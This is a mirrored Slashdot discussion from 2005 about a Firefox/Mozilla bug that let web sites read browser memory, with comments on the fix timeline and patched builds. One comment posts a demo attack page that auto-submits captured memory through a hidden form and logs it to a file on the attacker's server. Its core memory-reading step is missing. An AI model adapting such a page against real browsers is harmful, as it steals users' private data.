Slashdot Mirror

← Back to Stories (view on slashdot.org)

Mozilla / Firefox Memory Exposure Vulnerability

Posted by timothy on from the mine-sure-is-vulnerable dept.

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

6 of 132 comments (clear)

  1. Re:Confusing write-up by cjsnell · · Score: 5, Informative

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

    Yes, this is very dangerous.

  2. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · · Score: 5, Informative

    From the bugzilla bug report (copy it, they disallow /. links):

    Opened: 2005-04-01 13:40 PDT
    Last modified: 2005-04-01 22:39 PDT
    Resolution: FIXED

    So yes they did, it was fixed in under 10 hours, and published 3 days later.

  3. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · · Score: 3, Informative

    You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

  4. Ok, confirmed by cjsnell · · Score: 4, Informative
    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {

    First peice of readMemory() removed to satisfy Slashdot crapfilter
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.nasty.result.value = mem;

    document.nasty.submit();

    }

    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    open(OUTFILE,'>>/tmp/outfile');
    print $result OUTFILE;
    close(OUTFILE);
    </%init>
  5. Download the latest patched version right here by OmegaGX · · Score: 3, Informative

    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nig htly/latest-trunk/firefox-1.0+.en-US.win32.install er.exe
    I just used it and I am not vulnerable: all I see are lot's of X's just like in IE.

  6. Re:I'm shocked! by NanoGator · · Score: 3, Informative

    "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

    It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.

    (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

    (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

    --
    "Derp de derp."